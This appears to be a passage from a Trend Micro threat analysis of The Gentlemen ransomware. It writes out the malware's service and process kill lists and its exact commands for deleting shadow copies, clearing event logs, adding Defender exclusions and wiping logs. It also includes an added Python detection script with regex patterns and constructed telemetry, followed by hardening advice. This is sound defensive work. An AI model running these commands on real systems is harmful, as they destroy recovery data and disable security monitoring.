TrendMicro

Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed

In terms of execution, the ransomware accepts specific parameters:

  • --password (Required): 8-byte password parameter needed to execute the ransomware
  • --path (Optional): Target path parameter for specifying a custom encryption directory

The ransomware aggressively attempts to terminate key services commonly associated with backup, database, and security processes to maximize its impact:

net stop <service_name>

(.*)sql(.*), AcrSch2Svc, VSNAPVSS, MVarmor64, MVarmor, VeeamTransportSvc, VeeamDeploymentService, VeeamNFSSvc, AcronisAgent, QBIDPService, QBDBMgrN, QBCFMonitorService, OracleServiceORCL, MySQL, MSSQL, SAPHostExec, SAPHostControl, SAPD$, SAP$, postgresql, SAP, SAPService, GxFWD, GxVsshWProv, GXMMM, GxClMgr, MariaDB, GxCVD, GxClMgrS, GxVss, GxBlr, BackupExecRPCService, SQLAgent$SQLEXPRESS, BackupExecManagementService, BackupExecJobEngine, MSSQL$SQLEXPRESS, BackupExecDiveciMediaService, BackupExecAgentBrowser, SQLWriter, BackupExecAgentAccelerator, BackupExecVSSProvider, PDVFSService, SQLSERVERAGENT, WSBExchange, MSExchange$, MSExchange, sophos, msexchange, docker, MSSQLSERVER, MSSQL*, Sql, vss, backup, veeam, memtas, mepocs, vmms

Further, the ransomware terminates processes with the following command:

taskkill /IM <process_name>.exe /F

Veeam.EndPoint.Service.exe, mvdesktopservice.exe, VeeamDeploymentSvc.exe, VeeamTransportSvc.exe, VeeamNFSSvc.exe, EnterpriseClient.exe, DellSystemDetect.exe, avscc.exe, avagent.exe, sapstartsrv.exe, saposco.exe, saphostexec.exe, CVODS.exe, cvfwd.exe, cvd.exe, CVMountd.exe, tv_x64.exe, tv_w32.exe, pgAdmin4.exe, TeamViewer.exe, TeamViewer_Service.exe, SAP.exe, QBCFMonitorService.exe, pgAdmin3.exe, QBDBMgrN.exe, QBIDPService.exe, CagService.exe, vsnapvss.exe, raw_agent_svc.exe, cbInterface.exe, "Docker Desktop.exe", beserver.exe, pvlsvr.exe, bengien.exe, benetns.exe, vxmon.exe, bedbh.exe, IperiusService.exe, sqlceip.exe, xfssvccon.exe, wordpad.exe, winword.exe, visio.exe, thunderbird.exe, thebat.exe, Iperius.exe, psql.exe, postgres.exe, tbirdconfig.exe, synctime.exe, steam.exe, sqbcoreservice.exe, powerpnt.exe, cbVSCService11.exe, postmaster.exe, mysqld.exe, outlook.exe, oracle.exe, onenote.exe, ocssd.exe, ocomm.exe, ocautoupds.exe, SQLAGENT.exe, sqlwriter.exe, notepad.exe, mydesktopservice.exe, mydesktopqos.exe, mspub.exe, msaccess.exe, cbService.exe, sqlbrowser.exe, w3wp.exe, sql.exe, isqlplussvc.exe, infopath.exe, firefox.exe, excel.exe, encsvc.exe, Ssms.exe, DBeaver.exe, sqlservr.exe, dbsnmp.exe, dbeng50.exe, agntsvc.exe, vmcompute.exe, vmwp.exe, vmms.exe

Beyond service and process termination, the ransomware executes additional commands to impede recovery and forensic investigation:

  • Deletes the Recycle Bin contents: cmd /C "rd /s /q C:\$Recycle.Bin"
  • Deletes Remote Desktop Protocol (RDP) log files: cmd /C "del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.*"
  • Deletes Windows Defender support files: cmd /C "del /f /q C:\ProgramData\Microsoft\Windows Defender\Support\*.*"
  • Deletes Prefetch files: cmd /C "del /f /q C:\Windows\Prefetch\*.*"
  • Adds C:\ to the Windows Defender path exclusions: powershell -Command "Add-MpPreference -ExclusionPath C:\ -Force"
  • Adds its own executable, (unknown).exe, to the Windows Defender process exclusions: powershell -Command "Add-MpPreference -ExclusionProcess C:\Users\User\Desktop\(unknown).exe -Force"
  • Disables Windows Defender real-time monitoring: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force"
  • Clears the Security, Application and System event logs:
      wevtutil cl Security
      wevtutil cl Application
      wevtutil cl System
  • Deletes shadow copies:
      wmic shadowcopy delete
      vssadmin delete shadows /all /quiet

For final cleanup, the ransomware drops a batch script named after itself (e.g., (unknown).exe.bat). This script pings the local host for a brief delay, deletes the ransomware binary, and then deletes itself. This ensures comprehensive removal of its artifacts after the encryption routine is complete.
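Two things about the sequence above matter for detection. A single `net stop` or `taskkill` is routine administration, so the signal is the burst: dozens of stop/kill commands against backup, database and AV components from one host within seconds. The recovery-inhibition and Defender-tampering commands, by contrast, are each worth an alert on their own, and because the `wevtutil cl` commands clear only the Security, Application and System logs, telemetry that lands elsewhere (Sysmon, PowerShell and Windows Defender Operational channels, or an EDR that ships events off-host) survives the cleanup. The following is an added example written for this page, not code from the Trend Micro write-up. It runs both detections over process-creation records reduced to timestamp, host and command line (the shape of Security 4688 / Sysmon Event ID 1 data); the host names, timestamps, the `payload.exe` file name and the self-delete batch line are constructed, and `WATCHLIST` is an illustrative reduction of the article's stop/kill lists rather than anything the ransomware contains.

```python
"""Hunt for The Gentlemen's termination bursts and recovery-inhibition commands.

Added example for the write-up above; not the ransomware's or Trend Micro's code.
Events are constructed to resemble Windows Security 4688 / Sysmon Event ID 1
records reduced to (timestamp, host, command line).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Single-event detections distilled from the commands listed in the write-up.
# Paths are matched loosely so another drive letter or an expanded %SystemRoot%
# still hits.
RECOVERY_INHIBITION = {k: re.compile(v, re.I) for k, v in {
    "shadow_copy_delete": r'\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b',
    "event_log_clear": r'\bwevtutil(\.exe)?\s+cl\s+(security|application|system)\b',
    "defender_exclusion": r'Add-MpPreference\s+-Exclusion(Path|Process)\b',
    "defender_rtp_off": r'Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true\b',
    "rdp_log_wipe": r'\bdel\b.*\\LogFiles\\RDP',
    "recycle_bin_wipe": r'\brd\s+/s\s+/q\s+\S*\$Recycle\.Bin',
    "prefetch_wipe": r'\bdel\b.*\\Prefetch\\\*',
    "defender_support_wipe": r'\bdel\b.*Windows Defender\\Support\\',
    "self_delete_batch": r'\bping\b.*\b(127\.0\.0\.1|localhost)\b.*\bdel\b',
}.items()}

# The two termination primitives the ransomware uses; group 1 is the target.
SERVICE_STOP = re.compile(r'(?:^|[\\\s"])net1?(?:\.exe)?\s+stop\s+("[^"]+"|\S+)', re.I)
TASKKILL = re.compile(r'(?:^|[\\\s"])taskkill(?:\.exe)?\b.*?/IM\s+("[^"]+"|\S+)', re.I)

# Illustrative substrings covering the backup, database, hypervisor and AV names
# in the article's lists ("sql" catches MSSQL$..., sqlservr.exe and mysqld.exe).
WATCHLIST = ("veeam", "backupexec", "acronis", "sql", "postgres", "oracle",
             "sap", "sophos", "vss", "vmms", "exchange", "docker")


def is_watchlisted(target):
    """True if a stop/kill target looks like a backup, database or security component."""
    name = target.lower()
    return any(token in name for token in WATCHLIST)


def termination_target(cmdline):
    """Return the service or image a `net stop` / `taskkill /IM` targets, else None."""
    m = SERVICE_STOP.search(cmdline) or TASKKILL.search(cmdline)
    return m.group(1).strip('"') if m else None


def detect(events, window=timedelta(seconds=60), threshold=5):
    """Run both detections over process-creation events.

    Each recovery-inhibition / Defender-tampering command is an alert by itself.
    Stop/kill commands are only suspicious in bulk: `threshold` of them from one
    host inside `window` raises one mass_termination alert listing the
    watch-listed targets, so the analyst sees what was being silenced.
    """
    alerts = []
    recent = defaultdict(deque)  # host -> (timestamp, target) pairs inside the window
    fired = set()                # hosts that already raised mass_termination
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        for tag, rx in RECOVERY_INHIBITION.items():
            if rx.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "type": tag, "cmdline": ev["cmdline"]})
        target = termination_target(ev["cmdline"])
        if target is None:
            continue
        q = recent[ev["host"]]
        q.append((ts, target))
        while ts - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        if len(q) >= threshold and ev["host"] not in fired:
            fired.add(ev["host"])
            alerts.append({"host": ev["host"], "type": "mass_termination", "count": len(q),
                           "watchlisted": sorted({t for _, t in q if is_watchlisted(t)})})
    return alerts


def _ev(ts, host, cmdline):
    return {"ts": ts, "host": host, "cmdline": cmdline}


# Constructed telemetry: one routine admin action, then the sequence the
# write-up describes, compressed into a few seconds on one workstation.
SAMPLE_EVENTS = [
    _ev("2025-09-10T10:00:00", "ADMIN-01", "net stop spooler"),
    _ev("2025-09-10T10:15:00", "WS-FIN-07", "net stop VeeamTransportSvc"),
    _ev("2025-09-10T10:15:01", "WS-FIN-07", "net stop MSSQLSERVER"),
    _ev("2025-09-10T10:15:01", "WS-FIN-07", "net stop sophos"),
    _ev("2025-09-10T10:15:02", "WS-FIN-07", "taskkill /IM sqlservr.exe /F"),
    _ev("2025-09-10T10:15:02", "WS-FIN-07", 'taskkill /IM "Docker Desktop.exe" /F'),
    _ev("2025-09-10T10:15:03", "WS-FIN-07", "taskkill /IM notepad.exe /F"),
    _ev("2025-09-10T10:15:05", "WS-FIN-07", r'cmd /C "rd /s /q C:\$Recycle.Bin"'),
    _ev("2025-09-10T10:15:05", "WS-FIN-07", r'cmd /C "del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.*"'),
    _ev("2025-09-10T10:15:06", "WS-FIN-07", r'powershell -Command "Add-MpPreference -ExclusionPath C:\ -Force"'),
    _ev("2025-09-10T10:15:06", "WS-FIN-07", 'powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force"'),
    _ev("2025-09-10T10:15:07", "WS-FIN-07", "wevtutil cl Security"),
    _ev("2025-09-10T10:15:08", "WS-FIN-07", "vssadmin delete shadows /all /quiet"),
    _ev("2025-09-10T10:15:09", "WS-FIN-07", "wmic shadowcopy delete"),
    # Invented self-delete batch line following the article's description (ping
    # delay, delete the binary, delete the script); the real file name is not published.
    _ev("2025-09-10T10:16:00", "WS-FIN-07", r'cmd /c ping 127.0.0.1 -n 3 > nul & del /f /q C:\Users\User\Desktop\payload.exe & del "%~f0"'),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["host"], a["type"], a.get("count", ""), a.get("watchlisted", a.get("cmdline")))
```

Tune `threshold` and `window` to the environment: five stop/kill commands in a minute is low enough to catch the ransomware's burst on a workstation but will fire on a legitimate patch window on a database server, where a higher threshold or an allow-list of maintenance accounts is appropriate. The single-command detections need no tuning; none of those commands belongs in normal user activity.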

The Gentlemen ransomware campaign shows the rapid evolution of modern ransomware threats, blending advanced technical sophistication with persistent, targeted operations. This campaign is distinguished by its use of custom-built tools for defense evasion, its ability to study and adapt to deployed security software, and its methodical abuse of both legitimate and vulnerable system components to subvert layered enterprise defenses. By tailoring their tactics against specific security vendors, The Gentlemen have demonstrated an acute awareness of their targets’ environments and a willingness to engage in in-depth reconnaissance and tool modification throughout the course of their operation.

The campaign’s impact on critical infrastructure and use of double extortion techniques underscores the significant risk this threat actor poses to organizations. Their campaign illustrates the growing trend among ransomware operators to move beyond “one-size-fits-all” methods and toward highly customized attacks, raising the bar for detection, prevention, and incident response.

Organizations are strongly advised to review their security posture, focusing on proactive threat hunting for group-specific tools, tactics, and procedures, the strengthening of endpoint and network protections, and the continuous refinement of incident response strategies. Particular attention should be given to monitoring for anomalous administrative activity, the abuse of legitimate tools for lateral movement and privilege escalation, and early indications of defense evasion efforts targeting security solutions.

Given the group’s exploitation of internet-facing infrastructure and VPN appliances, Zero Trust controls are essential for preventing initial access and limiting blast radius. Organizations must eliminate direct RDP exposure to the internet, enforce multi-factor authentication for all administrative interfaces, and implement network segmentation between IT management tools and production systems. Enterprises should also implement virtual patching for known vulnerabilities in perimeter devices, particularly the VPN concentrators and firewalls that The Gentlemen have been observed targeting.

Essential access controls and monitoring include:

  • Restricting domain controller share access and alerting on unauthorized NETLOGON modifications
  • Auto-isolating devices showing indicators of driver-based attacks or anti-AV tool execution
  • Implementing time-based access controls for privileged accounts with automatic de-escalation
  • Monitoring for mass Active Directory queries and bulk group membership changes
  • Deploying deception technologies on critical file shares to detect reconnaissance activities

The immediate priority is hardening endpoint security deployments against the group’s documented process termination techniques. Organizations using Trend solutions should enable Tamper Protection with Anti-exploit Protection to prevent custom tools from terminating critical security processes. Additionally, password-protect agent uninstallation and activate Agent Self-Protection alongside Predictive Machine Learning in both pre-execution and runtime modes. These configurations specifically counter the group’s attempts to disable security services before ransomware deployment.

Critical endpoint controls should include:

  • Blocking execution from temporary and user download directories where attack tools are typically staged
  • Monitoring service stop commands targeting security processes and alerting on mass termination attempts
  • Implementing application control to restrict unauthorized remote access tools (RDP clients, file transfer utilities)
  • Enforcing driver signature verification and alerting on vulnerable driver loading attempts
  • Enabling behavioral detection for privilege escalation and credential dumping activities
     
